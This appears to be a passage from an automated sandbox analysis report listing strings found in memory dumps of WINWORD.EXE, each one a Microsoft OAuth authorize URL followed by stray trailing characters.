Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%EG
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&F
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/a
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4EV
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize5FW
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6GP
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize9
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeA3V
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeA?V
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeAGc
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeIa
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN~
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeO
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizePGr
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQHs
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeWFq
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeXa
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeY
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZ
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizea
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeaE
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizec
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecG
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecom7HQ
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizee
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefic
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeg
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizei
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeka
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizellJ
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemH
